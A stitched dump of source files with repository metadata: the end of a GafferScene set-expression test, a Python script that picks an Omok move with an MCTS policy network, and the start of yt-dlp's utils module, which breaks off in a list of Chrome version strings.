self.assertNotEqual( h, GafferScene.SetAlgo.setExpressionHash( "setA", group2["out"] ) )
def testColonInSetAndObjectNames( self ):
sphere1 = GafferScene.Sphere( "Sphere1" )
sphere1["name"].setValue( 'MyObject:sphere1' )
setA = GafferScene.Set( "SetA" )
setA["name"].setValue( "MySets:setA" )
setA["paths"].setValue( IECore.StringVectorData( [ "/MyObject:sphere1" ] ) )
self.assertCorrectEvaluation( setA["out"], "MySets:setA", [ "/MyObject:sphere1" ] )
self.assertCorrectEvaluation( setA["out"], "/MyObject:sphere1", [ "/MyObject:sphere1" ] )
def assertCorrectEvaluation( self, scenePlug, expression, expectedContents ) :
result = set( GafferScene.SetAlgo.evaluateSetExpression( expression, scenePlug ).paths() )
self.assertEqual( result, set( expectedContents ) )
| 47.668675 | 167 | 0.671174 |
795c562478cbd534b60a7df58f11dc300fed9342 | 2,136 | py | Python | app.py | sewon0918/pj4 | 144996e7f99e7639f1fffb34770ab9713307428d | [
"MIT"
] | null | null | null | app.py | sewon0918/pj4 | 144996e7f99e7639f1fffb34770ab9713307428d | [
"MIT"
] | null | null | null | app.py | sewon0918/pj4 | 144996e7f99e7639f1fffb34770ab9713307428d | [
"MIT"
] | null | null | null | from __future__ import print_function
import sys
import pickle
import numpy
#import torch
from game import Board, Game
from mcts_pure import MCTSPlayer as MCTS_Pure
from mcts_alphaZero import MCTSPlayer
from collections import OrderedDict
from policy_value_net_numpy import PolicyValueNetNumpy
# from policy_value_net_pytorch import PolicyValueNet # Pytorch
# from policy_value_net_tensorflow import PolicyValueNet # Tensorflow
# from policy_value_net_keras import PolicyValueNet # Keras
input_from_app = sys.argv[1:]
model_file_list = ['./Omok/pj4/best_policy_10_10_5.model', './Omok/pj4/best_policy_8_8_5.model']
n = 5
length_list = [10, 8]
def parse(inputs):
if inputs[0] != ' ':
p1list = inputs[0].split(',')
for i in range(len(p1list)):
p1list[i] = int(p1list[i])
else:
p1list = inputs[0]
if inputs[1] != ' ':
p2list = inputs[1].split(',')
for i in range(len(p2list)):
p2list[i] = int(p2list[i])
else:
p2list = inputs[1]
map = int(inputs[2])
return (p1list, p2list,map)
def makemap(input1, input2):
result = Board(width = width, height = height, n_in_row = n)
result.init_board(start_player = 0)
if input1 != ' ':
for i in range(len(input1)):
result.states[input1[i]] = 1
result.availables.remove(input1[i])
if input2 != ' ':
for j in range(len(input2)):
result.states[input2[j]] = 2
result.availables.remove(input2[j])
result.current_player = 1
return result
parsed_input1, parsed_input2, ai= parse(input_from_app)
width = height = length_list[ai]
board = makemap(parsed_input1, parsed_input2)
model_file = model_file_list[ai]
try:
policy_param = pickle.load(open(model_file, 'rb'))
except:
policy_param = pickle.load(open(model_file, 'rb'), encoding='bytes') # To support python3
best_policy = PolicyValueNetNumpy(width, height, policy_param)
mcts_player = MCTSPlayer(best_policy.policy_value_fn, c_puct=5, n_playout=400) # set larger n_playout for better performance
print(mcts_player.get_action(board))
sys.stdout.flush() | 31.880597 | 125 | 0.692416 |
795c5632ffe8f88e9d41b52932c34b5ac2538826 | 188,338 | py | Python | yt_dlp/utils.py | TpmKranz/yt-dlp | 182b6ae8a6b12ad49f2fa880f8db436f9a79a8ba | [
"Unlicense"
] | 5 | 2021-08-24T17:08:12.000Z | 2022-03-03T13:06:09.000Z | yt_dlp/utils.py | ZizzyDizzyMC/yt-dlp | 5483c29b3a6ba527375c8deb02905c0d16e252ef | [
"Unlicense"
] | null | null | null | yt_dlp/utils.py | ZizzyDizzyMC/yt-dlp | 5483c29b3a6ba527375c8deb02905c0d16e252ef | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
from __future__ import unicode_literals
import base64
import binascii
import calendar
import codecs
import collections
import contextlib
import ctypes
import datetime
import email.utils
import email.header
import errno
import functools
import gzip
import imp
import io
import itertools
import json
import locale
import math
import operator
import os
import platform
import random
import re
import socket
import ssl
import subprocess
import sys
import tempfile
import time
import traceback
import xml.etree.ElementTree
import zlib
from .compat import (
compat_HTMLParseError,
compat_HTMLParser,
compat_HTTPError,
compat_basestring,
compat_chr,
compat_cookiejar,
compat_ctypes_WINFUNCTYPE,
compat_etree_fromstring,
compat_expanduser,
compat_html_entities,
compat_html_entities_html5,
compat_http_client,
compat_integer_types,
compat_numeric_types,
compat_kwargs,
compat_os_name,
compat_parse_qs,
compat_shlex_quote,
compat_str,
compat_struct_pack,
compat_struct_unpack,
compat_urllib_error,
compat_urllib_parse,
compat_urllib_parse_urlencode,
compat_urllib_parse_urlparse,
compat_urllib_parse_urlunparse,
compat_urllib_parse_quote,
compat_urllib_parse_quote_plus,
compat_urllib_parse_unquote_plus,
compat_urllib_request,
compat_urlparse,
compat_xpath,
)
from .socks import (
ProxyType,
sockssocket,
)
def register_socks_protocols():
# "Register" SOCKS protocols
# In Python < 2.6.5, urlsplit() suffers from bug https://bugs.python.org/issue7904
# URLs with protocols not in urlparse.uses_netloc are not handled correctly
for scheme in ('socks', 'socks4', 'socks4a', 'socks5'):
if scheme not in compat_urlparse.uses_netloc:
compat_urlparse.uses_netloc.append(scheme)
# This is not clearly defined otherwise
compiled_regex_type = type(re.compile(''))
def random_user_agent():
_USER_AGENT_TPL = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/%s Safari/537.36'
_CHROME_VERSIONS = (
'74.0.3729.129',
'76.0.3780.3',
'76.0.3780.2',
'74.0.3729.128',
'76.0.3780.1',
'76.0.3780.0',
'75.0.3770.15',
'74.0.3729.127',
'74.0.3729.126',
'76.0.3779.1',
'76.0.3779.0',
'75.0.3770.14',
'74.0.3729.125',
'76.0.3778.1',
'76.0.3778.0',
'75.0.3770.13',
'74.0.3729.124',
'74.0.3729.123',
'73.0.3683.121',
'76.0.3777.1',
'76.0.3777.0',
'75.0.3770.12',
'74.0.3729.122',
'76.0.3776.4',
'75.0.3770.11',
'74.0.3729.121',
'76.0.3776.3',
'76.0.3776.2',
'73.0.3683.120',
'74.0.3729.120',
'74.0.3729.119',
'74.0.3729.118',
'76.0.3776.1',
'76.0.3776.0',
'76.0.3775.5',
'75.0.3770.10',
'74.0.3729.117',
'76.0.3775.4',
'76.0.3775.3',
'74.0.3729.116',
'75.0.3770.9',
'76.0.3775.2',
'76.0.3775.1',
'76.0.3775.0',
'75.0.3770.8',
'74.0.3729.115',
'74.0.3729.114',
'76.0.3774.1',
'76.0.3774.0',
'75.0.3770.7',
'74.0.3729.113',
'74.0.3729.112',
'74.0.3729.111',
'76.0.3773.1',
'76.0.3773.0',
'75.0.3770.6',
'74.0.3729.110',
'74.0.3729.109',
'76.0.3772.1',
'76.0.3772.0',
'75.0.3770.5',
'74.0.3729.108',
'74.0.3729.107',
'76.0.3771.1',
'76.0.3771.0',
'75.0.3770.4',
'74.0.3729.106',
'74.0.3729.105',
'75.0.3770.3',
'74.0.3729.104',
'74.0.3729.103',
'74.0.3729.102',
'75.0.3770.2',
'74.0.3729.101',
'75.0.3770.1',
'75.0.3770.0',
'74.0.3729.100',
'75.0.3769.5',
'75.0.3769.4',
'74.0.3729.99',
'75.0.3769.3',
'75.0.3769.2',
'75.0.3768.6',
'74.0.3729.98',
'75.0.3769.1',
'75.0.3769.0',
'74.0.3729.97',
'73.0.3683.119',
'73.0.3683.118',
'74.0.3729.96',
'75.0.3768.5',
'75.0.3768.4',
'75.0.3768.3',
'75.0.3768.2',
'74.0.3729.95',
'74.0.3729.94',
'75.0.3768.1',
'75.0.3768.0',
'74.0.3729.93',
'74.0.3729.92',
'73.0.3683.117',
'74.0.3729.91',
'75.0.3766.3',
'74.0.3729.90',
'75.0.3767.2',
'75.0.3767.1',
'75.0.3767.0',
'74.0.3729.89',
'73.0.3683.116',
'75.0.3766.2',
'74.0.3729.88',
'75.0.3766.1',
'75.0.3766.0',
'74.0.3729.87',
'73.0.3683.115',
'74.0.3729.86',
'75.0.3765.1',
'75.0.3765.0',
'74.0.3729.85',
'73.0.3683.114',
'74.0.3729.84',
'75.0.3764.1',
'75.0.3764.0',
'74.0.3729.83',
'73.0.3683.113',
'75.0.3763.2',
'75.0.3761.4',
'74.0.3729.82',
'75.0.3763.1',
'75.0.3763.0',
'74.0.3729.81',
'73.0.3683.112',
'75.0.3762.1',
'75.0.3762.0',
'74.0.3729.80',
'75.0.3761.3',
'74.0.3729.79',
'73.0.3683.111',
'75.0.3761.2',
'74.0.3729.78',
'74.0.3729.77',
'75.0.3761.1',
'75.0.3761.0',
'73.0.3683.110',
'74.0.3729.76',
'74.0.3729.75',
'75.0.3760.0',
'74.0.3729.74',
'75.0.3759.8',
'75.0.3759.7',
'75.0.3759.6',
'74.0.3729.73',
'75.0.3759.5',
'74.0.3729.72',
'73.0.3683.109',
'75.0.3759.4',
'75.0.3759.3',
'74.0.3729.71',
'75.0.3759.2',
'74.0.3729.70',
'73.0.3683.108',
'74.0.3729.69',
'75.0.3759.1',
'75.0.3759.0',
'74.0.3729.68',
'73.0.3683.107',
'74.0.3729.67',
'75.0.3758.1',
'75.0.3758.0',
'74.0.3729.66',
'73.0.3683.106',
'74.0.3729.65',
'75.0.3757.1',
'75.0.3757.0',
'74.0.3729.64',
'73.0.3683.105',
'74.0.3729.63',
'75.0.3756.1',
'75.0.3756.0',
'74.0.3729.62',
'73.0.3683.104',
'75.0.3755.3',
'75.0.3755.2',
'73.0.3683.103',
'75.0.3755.1',
'75.0.3755.0',
'74.0.3729.61',
'73.0.3683.102',
'74.0.3729.60',
'75.0.3754.2',
'74.0.3729.59',
'75.0.3753.4',
'74.0.3729.58',
'75.0.3754.1',
'75.0.3754.0',
'74.0.3729.57',
'73.0.3683.101',
'75.0.3753.3',
'75.0.3752.2',
'75.0.3753.2',
'74.0.3729.56',
'75.0.3753.1',
'75.0.3753.0',
'74.0.3729.55',
'73.0.3683.100',
'74.0.3729.54',
'75.0.3752.1',
'75.0.3752.0',
'74.0.3729.53',
'73.0.3683.99',
'74.0.3729.52',
'75.0.3751.1',
'75.0.3751.0',
'74.0.3729.51',
'73.0.3683.98',
'74.0.3729.50',
'75.0.3750.0',
'74.0.3729.49',
'74.0.3729.48',
'74.0.3729.47',
'75.0.3749.3',
'74.0.3729.46',
'73.0.3683.97',
'75.0.3749.2',
'74.0.3729.45',
'75.0.3749.1',
'75.0.3749.0',
'74.0.3729.44',
'73.0.3683.96',
'74.0.3729.43',
'74.0.3729.42',
'75.0.3748.1',
'75.0.3748.0',
'74.0.3729.41',
'75.0.3747.1',
'73.0.3683.95',
'75.0.3746.4',
'74.0.3729.40',
'74.0.3729.39',
'75.0.3747.0',
'75.0.3746.3',
'75.0.3746.2',
'74.0.3729.38',
'75.0.3746.1',
'75.0.3746.0',
'74.0.3729.37',
'73.0.3683.94',
'75.0.3745.5',
'75.0.3745.4',
'75.0.3745.3',
'75.0.3745.2',
'74.0.3729.36',
'75.0.3745.1',
'75.0.3745.0',
'75.0.3744.2',
'74.0.3729.35',
'73.0.3683.93',
'74.0.3729.34',
'75.0.3744.1',
'75.0.3744.0',
'74.0.3729.33',
'73.0.3683.92',
'74.0.3729.32',
'74.0.3729.31',
'73.0.3683.91',
'75.0.3741.2',
'75.0.3740.5',
'74.0.3729.30',
'75.0.3741.1',
'75.0.3741.0',
'74.0.3729.29',
'75.0.3740.4',
'73.0.3683.90',
'74.0.3729.28',
'75.0.3740.3',
'73.0.3683.89',
'75.0.3740.2',
'74.0.3729.27',
'75.0.3740.1',
'75.0.3740.0',
'74.0.3729.26',
'73.0.3683.88',
'73.0.3683.87',
'74.0.3729.25',
'75.0.3739.1',
'75.0.3739.0',
'73.0.3683.86',
'74.0.3729.24',
'73.0.3683.85',
'75.0.3738.4',
'75.0.3738.3',
'75.0.3738.2',
'75.0.3738.1',
'75.0.3738.0',
'74.0.3729.23',
'73.0.3683.84',
'74.0.3729.22',
'74.0.3729.21',
'75.0.3737.1',
'75.0.3737.0',
'74.0.3729.20',
'73.0.3683.83',
'74.0.3729.19',
'75.0.3736.1',
'75.0.3736.0',
'74.0.3729.18',
'73.0.3683.82',
'74.0.3729.17',
'75.0.3735.1',
'75.0.3735.0',
'74.0.3729.16',
'73.0.3683.81',
'75.0.3734.1',
'75.0.3734.0',
'74.0.3729.15',
'73.0.3683.80',
'74.0.3729.14',
'75.0.3733.1',
'75.0.3733.0',
'75.0.3732.1',
'74.0.3729.13',
'74.0.3729.12',
'73.0.3683.79',
'74.0.3729.11',
'75.0.3732.0',
'74.0.3729.10',
'73.0.3683.78',
'74.0.3729.9',
'74.0.3729.8',
'74.0.3729.7',
'75.0.3731.3',
'75.0.3731.2',
'75.0.3731.0',
'74.0.3729.6',
'73.0.3683.77',
'73.0.3683.76',
'75.0.3730.5',
'75.0.3730.4',
'73.0.3683.75',
'74.0.3729.5',
'73.0.3683.74',
'75.0.3730.3',
'75.0.3730.2',
'74.0.3729.4',
'73.0.3683.73',
'73.0.3683.72',
'75.0.3730.1',
'75.0.3730.0',
'74.0.3729.3',
'73.0.3683.71',
'74.0.3729.2',
'73.0.3683.70',
'74.0.3729.1',
'74.0.3729.0',
'74.0.3726.4',
'73.0.3683.69',
'74.0.3726.3',
'74.0.3728.0',
'74.0.3726.2',
'73.0.3683.68',
'74.0.3726.1',
'74.0.3726.0',
'74.0.3725.4',
'73.0.3683.67',
'73.0.3683.66',
'74.0.3725.3',
'74.0.3725.2',
'74.0.3725.1',
'74.0.3724.8',
'74.0.3725.0',
'73.0.3683.65',
'74.0.3724.7',
'74.0.3724.6',
'74.0.3724.5',
'74.0.3724.4',
'74.0.3724.3',
'74.0.3724.2',
'74.0.3724.1',
'74.0.3724.0',
'73.0.3683.64',
'74.0.3723.1',
'74.0.3723.0',
'73.0.3683.63',
'74.0.3722.1',
'74.0.3722.0',
'73.0.3683.62',
'74.0.3718.9',
'74.0.3702.3',
'74.0.3721.3',
'74.0.3721.2',
'74.0.3721.1',
'74.0.3721.0',
'74.0.3720.6',
'73.0.3683.61',
'72.0.3626.122',
'73.0.3683.60',
'74.0.3720.5',
'72.0.3626.121',
'74.0.3718.8',
'74.0.3720.4',
'74.0.3720.3',
'74.0.3718.7',
'74.0.3720.2',
'74.0.3720.1',
'74.0.3720.0',
'74.0.3718.6',
'74.0.3719.5',
'73.0.3683.59',
'74.0.3718.5',
'74.0.3718.4',
'74.0.3719.4',
'74.0.3719.3',
'74.0.3719.2',
'74.0.3719.1',
'73.0.3683.58',
'74.0.3719.0',
'73.0.3683.57',
'73.0.3683.56',
'74.0.3718.3',
'73.0.3683.55',
'74.0.3718.2',
'74.0.3718.1',
'74.0.3718.0',
'73.0.3683.54',
'74.0.3717.2',
'73.0.3683.53',
'74.0.3717.1',
'74.0.3717.0',
'73.0.3683.52',
'74.0.3716.1',
'74.0.3716.0',
'73.0.3683.51',
'74.0.3715.1',
'74.0.3715.0',
'73.0.3683.50',
'74.0.3711.2',
'74.0.3714.2',
'74.0.3713.3',
'74.0.3714.1',
'74.0.3714.0',
'73.0.3683.49',
'74.0.3713.1',
'74.0.3713.0',
'72.0.3626.120',
'73.0.3683.48',
'74.0.3712.2',
'74.0.3712.1',
'74.0.3712.0',
'73.0.3683.47',
'72.0.3626.119',
'73.0.3683.46',
'74.0.3710.2',
'72.0.3626.118',
'74.0.3711.1',
'74.0.3711.0',
'73.0.3683.45',
'72.0.3626.117',
'74.0.3710.1',
'74.0.3710.0',
'73.0.3683.44',
'72.0.3626.116',
'74.0.3709.1',
'74.0.3709.0',
'74.0.3704.9',
'73.0.3683.43',
'72.0.3626.115',
'74.0.3704.8',
'74.0.3704.7',
'74.0.3708.0',
'74.0.3706.7',
'74.0.3704.6',
'73.0.3683.42',
'72.0.3626.114',
'74.0.3706.6',
'72.0.3626.113',
'74.0.3704.5',
'74.0.3706.5',
'74.0.3706.4',
'74.0.3706.3',
'74.0.3706.2',
'74.0.3706.1',
'74.0.3706.0',
'73.0.3683.41',
'72.0.3626.112',
'74.0.3705.1',
'74.0.3705.0',
'73.0.3683.40',
'72.0.3626.111',
'73.0.3683.39',
'74.0.3704.4',
'73.0.3683.38',
'74.0.3704.3',
'74.0.3704.2',
'74.0.3704.1',
'74.0.3704.0',
'73.0.3683.37',
'72.0.3626.110',
'72.0.3626.109',
'74.0.3703.3',
'74.0.3703.2',
'73.0.3683.36',
'74.0.3703.1',
'74.0.3703.0',
'73.0.3683.35',
'72.0.3626.108',
'74.0.3702.2',
'74.0.3699.3',
'74.0.3702.1',
'74.0.3702.0',
'73.0.3683.34',
'72.0.3626.107',
'73.0.3683.33',
'74.0.3701.1',
'74.0.3701.0',
'73.0.3683.32',
'73.0.3683.31',
'72.0.3626.105',
'74.0.3700.1',
'74.0.3700.0',
'73.0.3683.29',
'72.0.3626.103',
'74.0.3699.2',
'74.0.3699.1',
'74.0.3699.0',
'73.0.3683.28',
'72.0.3626.102',
'73.0.3683.27',
'73.0.3683.26',
'74.0.3698.0',
'74.0.3696.2',
'72.0.3626.101',
'73.0.3683.25',
'74.0.3696.1',
'74.0.3696.0',
'74.0.3694.8',
'72.0.3626.100',
'74.0.3694.7',
'74.0.3694.6',
'74.0.3694.5',
'74.0.3694.4',
'72.0.3626.99',
'72.0.3626.98',
'74.0.3694.3',
'73.0.3683.24',
'72.0.3626.97',
'72.0.3626.96',
'72.0.3626.95',
'73.0.3683.23',
'72.0.3626.94',
'73.0.3683.22',
'73.0.3683.21',
'72.0.3626.93',
'74.0.3694.2',
'72.0.3626.92',
'74.0.3694.1',
'74.0.3694.0',
'74.0.3693.6',
'73.0.3683.20',
'72.0.3626.91',
'74.0.3693.5',
'74.0.3693.4',
'74.0.3693.3',
'74.0.3693.2',
'73.0.3683.19',
'74.0.3693.1',
'74.0.3693.0',
'73.0.3683.18',
'72.0.3626.90',
'74.0.3692.1',
'74.0.3692.0',
'73.0.3683.17',
'72.0.3626.89',
'74.0.3687.3',
'74.0.3691.1',
'74.0.3691.0',
'73.0.3683.16',
'72.0.3626.88',
'72.0.3626.87',
'73.0.3683.15',
'74.0.3690.1',
'74.0.3690.0',
'73.0.3683.14',
'72.0.3626.86',
'73.0.3683.13',
'73.0.3683.12',
'74.0.3689.1',
'74.0.3689.0',
'73.0.3683.11',
'72.0.3626.85',
'73.0.3683.10',
'72.0.3626.84',
'73.0.3683.9',
'74.0.3688.1',
'74.0.3688.0',
'73.0.3683.8',
'72.0.3626.83',
'74.0.3687.2',
'74.0.3687.1',
'74.0.3687.0',
'73.0.3683.7',
'72.0.3626.82',
'74.0.3686.4',
'72.0.3626.81',
'74.0.3686.3',
'74.0.3686.2',
'74.0.3686.1',
'74.0.3686.0',
'73.0.3683.6',
'72.0.3626.80',
'74.0.3685.1',
'74.0.3685.0',
'73.0.3683.5',
'72.0.3626.79',
'74.0.3684.1',
'74.0.3684.0',
'73.0.3683.4',
'72.0.3626.78',
'72.0.3626.77',
'73.0.3683.3',
'73.0.3683.2',
'72.0.3626.76',
'73.0.3683.1',
'73.0.3683.0',
'72.0.3626.75',
'71.0.3578.141',
'73.0.3682.1',
'73.0.3682.0',
'72.0.3626.74',
'71.0.3578.140',
'73.0.3681.4',
'73.0.3681.3',
'73.0.3681.2',
'73.0.3681.1',
'73.0.3681.0',
'72.0.3626.73',
'71.0.3578.139',
'72.0.3626.72',
'72.0.3626.71',
'73.0.3680.1',
'73.0.3680.0',
'72.0.3626.70',
'71.0.3578.138',
'73.0.3678.2',
'73.0.3679.1',
'73.0.3679.0',
'72.0.3626.69',
'71.0.3578.137',
'73.0.3678.1',
'73.0.3678.0',
'71.0.3578.136',
'73.0.3677.1',
'73.0.3677.0',
'72.0.3626.68',
'72.0.3626.67',
'71.0.3578.135',
'73.0.3676.1',
'73.0.3676.0',
'73.0.3674.2',
'72.0.3626.66',
'71.0.3578.134',
'73.0.3674.1',
'73.0.3674.0',
'72.0.3626.65',
'71.0.3578.133',
'73.0.3673.2',
'73.0.3673.1',
'73.0.3673.0',
'72.0.3626.64',
'71.0.3578.132',
'72.0.3626.63',
'72.0.3626.62',
'72.0.3626.61',
'72.0.3626.60',
'73.0.3672.1',
'73.0.3672.0',
'72.0.3626.59',
'71.0.3578.131',
'73.0.3671.3',
'73.0.3671.2',
'73.0.3671.1',
'73.0.3671.0',
'72.0.3626.58',
'71.0.3578.130',
'73.0.3670.1',
'73.0.3670.0',
'72.0.3626.57',
'71.0.3578.129',
'73.0.3669.1',
'73.0.3669.0',
'72.0.3626.56',
'71.0.3578.128',
'73.0.3668.2',
'73.0.3668.1',
'73.0.3668.0',
'72.0.3626.55',
'71.0.3578.127',
'73.0.3667.2',
'73.0.3667.1',
'73.0.3667.0',
'72.0.3626.54',
'71.0.3578.126',
'73.0.3666.1',
'73.0.3666.0',
'72.0.3626.53',
'71.0.3578.125',
'73.0.3665.4',
'73.0.3665.3',
'72.0.3626.52',
'73.0.3665.2',
'73.0.3664.4',
'73.0.3665.1',
'73.0.3665.0',
'72.0.3626.51',
'71.0.3578.124',
'72.0.3626.50',
'73.0.3664.3',
'73.0.3664.2',
'73.0.3664.1',
'73.0.3664.0',
'73.0.3663.2',
'72.0.3626.49',
'71.0.3578.123',
'73.0.3663.1',
'73.0.3663.0',
'72.0.3626.48',
'71.0.3578.122',
'73.0.3662.1',
'73.0.3662.0',
'72.0.3626.47',
'71.0.3578.121',
'73.0.3661.1',
'72.0.3626.46',
'73.0.3661.0',
'72.0.3626.45',
'71.0.3578.120',
'73.0.3660.2',
'73.0.3660.1',
'73.0.3660.0',
'72.0.3626.44',
'71.0.3578.119',
'73.0.3659.1',
'73.0.3659.0',
'72.0.3626.43',
'71.0.3578.118',
'73.0.3658.1',
'73.0.3658.0',
'72.0.3626.42',
'71.0.3578.117',
'73.0.3657.1',
'73.0.3657.0',
'72.0.3626.41',
'71.0.3578.116',
'73.0.3656.1',
'73.0.3656.0',
'72.0.3626.40',
'71.0.3578.115',
'73.0.3655.1',
'73.0.3655.0',
'72.0.3626.39',
'71.0.3578.114',
'73.0.3654.1',
'73.0.3654.0',
'72.0.3626.38',
'71.0.3578.113',
'73.0.3653.1',
'73.0.3653.0',
'72.0.3626.37',
'71.0.3578.112',
'73.0.3652.1',
'73.0.3652.0',
'72.0.3626.36',
'71.0.3578.111',
'73.0.3651.1',
'73.0.3651.0',
'72.0.3626.35',
'71.0.3578.110',
'73.0.3650.1',
'73.0.3650.0',
'72.0.3626.34',
'71.0.3578.109',
'73.0.3649.1',
'73.0.3649.0',
'72.0.3626.33',
'71.0.3578.108',
'73.0.3648.2',
'73.0.3648.1',
'73.0.3648.0',
'72.0.3626.32',
'71.0.3578.107',
'73.0.3647.2',
'73.0.3647.1',
'73.0.3647.0',
'72.0.3626.31',
'71.0.3578.106',
'73.0.3635.3',
'73.0.3646.2',
'73.0.3646.1',
'73.0.3646.0',
'72.0.3626.30',
'71.0.3578.105',
'72.0.3626.29',
'73.0.3645.2',
'73.0.3645.1',
'73.0.3645.0',
'72.0.3626.28',
'71.0.3578.104',
'72.0.3626.27',
'72.0.3626.26',
'72.0.3626.25',
'72.0.3626.24',
'73.0.3644.0',
'73.0.3643.2',
'72.0.3626.23',
'71.0.3578.103',
'73.0.3643.1',
'73.0.3643.0',
'72.0.3626.22',
'71.0.3578.102',
'73.0.3642.1',
'73.0.3642.0',
'72.0.3626.21',
'71.0.3578.101',
'73.0.3641.1',
'73.0.3641.0',
'72.0.3626.20',
'71.0.3578.100',
'72.0.3626.19',
'73.0.3640.1',
'73.0.3640.0',
'72.0.3626.18',
'73.0.3639.1',
'71.0.3578.99',
'73.0.3639.0',
'72.0.3626.17',
'73.0.3638.2',
'72.0.3626.16',
'73.0.3638.1',
'73.0.3638.0',
'72.0.3626.15',
'71.0.3578.98',
'73.0.3635.2',
'71.0.3578.97',
'73.0.3637.1',
'73.0.3637.0',
'72.0.3626.14',
'71.0.3578.96',
'71.0.3578.95',
'72.0.3626.13',
'71.0.3578.94',
'73.0.3636.2',
'71.0.3578.93',
'73.0.3636.1',
'73.0.3636.0',
'72.0.3626.12',
'71.0.3578.92',
'73.0.3635.1',
'73.0.3635.0',
'72.0.3626.11',
'71.0.3578.91',
'73.0.3634.2',
'73.0.3634.1',
'73.0.3634.0',
'72.0.3626.10',
'71.0.3578.90',
'71.0.3578.89',
'73.0.3633.2',
'73.0.3633.1',
'73.0.3633.0',
'72.0.3610.4',
'72.0.3626.9',
'71.0.3578.88',
'73.0.3632.5',
'73.0.3632.4',
'73.0.3632.3',
'73.0.3632.2',
'73.0.3632.1',
'73.0.3632.0',
'72.0.3626.8',
'71.0.3578.87',
'73.0.3631.2',
'73.0.3631.1',
'73.0.3631.0',
'72.0.3626.7',
'71.0.3578.86',
'72.0.3626.6',
'73.0.3630.1',
'73.0.3630.0',
'72.0.3626.5',
'71.0.3578.85',
'72.0.3626.4',
'73.0.3628.3',
'73.0.3628.2',
'73.0.3629.1',
'73.0.3629.0',
'72.0.3626.3',
'71.0.3578.84',
'73.0.3628.1',
'73.0.3628.0',
'71.0.3578.83',
'73.0.3627.1',
'73.0.3627.0',
'72.0.3626.2',
'71.0.3578.82',
'71.0.3578.81',
'71.0.3578.80',
'72.0.3626.1',
'72.0.3626.0',
'71.0.3578.79',
'70.0.3538.124',
'71.0.3578.78',
'72.0.3623.4',
'72.0.3625.2',
'72.0.3625.1',
'72.0.3625.0',
'71.0.3578.77',
'70.0.3538.123',
'72.0.3624.4',
'72.0.3624.3',
'72.0.3624.2',
'71.0.3578.76',
'72.0.3624.1',
'72.0.3624.0',
'72.0.3623.3',
'71.0.3578.75',
'70.0.3538.122',
'71.0.3578.74',
'72.0.3623.2',
'72.0.3610.3',
'72.0.3623.1',
'72.0.3623.0',
'72.0.3622.3',
'72.0.3622.2',
'71.0.3578.73',
'70.0.3538.121',
'72.0.3622.1',
'72.0.3622.0',
'71.0.3578.72',
'70.0.3538.120',
'72.0.3621.1',
'72.0.3621.0',
'71.0.3578.71',
'70.0.3538.119',
'72.0.3620.1',
'72.0.3620.0',
'71.0.3578.70',
'70.0.3538.118',
'71.0.3578.69',
'72.0.3619.1',
'72.0.3619.0',
'71.0.3578.68',
'70.0.3538.117',
'71.0.3578.67',
'72.0.3618.1',
'72.0.3618.0',
'71.0.3578.66',
'70.0.3538.116',
'72.0.3617.1',
'72.0.3617.0',
'71.0.3578.65',
'70.0.3538.115',
'72.0.3602.3',
'71.0.3578.64',
'72.0.3616.1',
'72.0.3616.0',
'71.0.3578.63',
'70.0.3538.114',
'71.0.3578.62',
'72.0.3615.1',
'72.0.3615.0',
'71.0.3578.61',
'70.0.3538.113',
'72.0.3614.1',
'72.0.3614.0',
'71.0.3578.60',
'70.0.3538.112',
'72.0.3613.1',
'72.0.3613.0',
'71.0.3578.59',
'70.0.3538.111',
'72.0.3612.2',
'72.0.3612.1',
'72.0.3612.0',
'70.0.3538.110',
'71.0.3578.58',
'70.0.3538.109',
'72.0.3611.2',
'72.0.3611.1',
'72.0.3611.0',
'71.0.3578.57',
'70.0.3538.108',
'72.0.3610.2',
'71.0.3578.56',
'71.0.3578.55',
'72.0.3610.1',
'72.0.3610.0',
'71.0.3578.54',
'70.0.3538.107',
'71.0.3578.53',
'72.0.3609.3',
'71.0.3578.52',
'72.0.3609.2',
'71.0.3578.51',
'72.0.3608.5',
'72.0.3609.1',
'72.0.3609.0',
'71.0.3578.50',
'70.0.3538.106',
'72.0.3608.4',
'72.0.3608.3',
'72.0.3608.2',
'71.0.3578.49',
'72.0.3608.1',
'72.0.3608.0',
'70.0.3538.105',
'71.0.3578.48',
'72.0.3607.1',
'72.0.3607.0',
'71.0.3578.47',
'70.0.3538.104',
'72.0.3606.2',
'72.0.3606.1',
'72.0.3606.0',
'71.0.3578.46',
'70.0.3538.103',
'70.0.3538.102',
'72.0.3605.3',
'72.0.3605.2',
'72.0.3605.1',
'72.0.3605.0',
'71.0.3578.45',
'70.0.3538.101',
'71.0.3578.44',
'71.0.3578.43',
'70.0.3538.100',
'70.0.3538.99',
'71.0.3578.42',
'72.0.3604.1',
'72.0.3604.0',
'71.0.3578.41',
'70.0.3538.98',
'71.0.3578.40',
'72.0.3603.2',
'72.0.3603.1',
'72.0.3603.0',
'71.0.3578.39',
'70.0.3538.97',
'72.0.3602.2',
'71.0.3578.38',
'71.0.3578.37',
'72.0.3602.1',
'72.0.3602.0',
'71.0.3578.36',
'70.0.3538.96',
'72.0.3601.1',
'72.0.3601.0',
'71.0.3578.35',
'70.0.3538.95',
'72.0.3600.1',
'72.0.3600.0',
'71.0.3578.34',
'70.0.3538.94',
'72.0.3599.3',
'72.0.3599.2',
'72.0.3599.1',
'72.0.3599.0',
'71.0.3578.33',
'70.0.3538.93',
'72.0.3598.1',
'72.0.3598.0',
'71.0.3578.32',
'70.0.3538.87',
'72.0.3597.1',
'72.0.3597.0',
'72.0.3596.2',
'71.0.3578.31',
'70.0.3538.86',
'71.0.3578.30',
'71.0.3578.29',
'72.0.3596.1',
'72.0.3596.0',
'71.0.3578.28',
'70.0.3538.85',
'72.0.3595.2',
'72.0.3591.3',
'72.0.3595.1',
'72.0.3595.0',
'71.0.3578.27',
'70.0.3538.84',
'72.0.3594.1',
'72.0.3594.0',
'71.0.3578.26',
'70.0.3538.83',
'72.0.3593.2',
'72.0.3593.1',
'72.0.3593.0',
'71.0.3578.25',
'70.0.3538.82',
'72.0.3589.3',
'72.0.3592.2',
'72.0.3592.1',
'72.0.3592.0',
'71.0.3578.24',
'72.0.3589.2',
'70.0.3538.81',
'70.0.3538.80',
'72.0.3591.2',
'72.0.3591.1',
'72.0.3591.0',
'71.0.3578.23',
'70.0.3538.79',
'71.0.3578.22',
'72.0.3590.1',
'72.0.3590.0',
'71.0.3578.21',
'70.0.3538.78',
'70.0.3538.77',
'72.0.3589.1',
'72.0.3589.0',
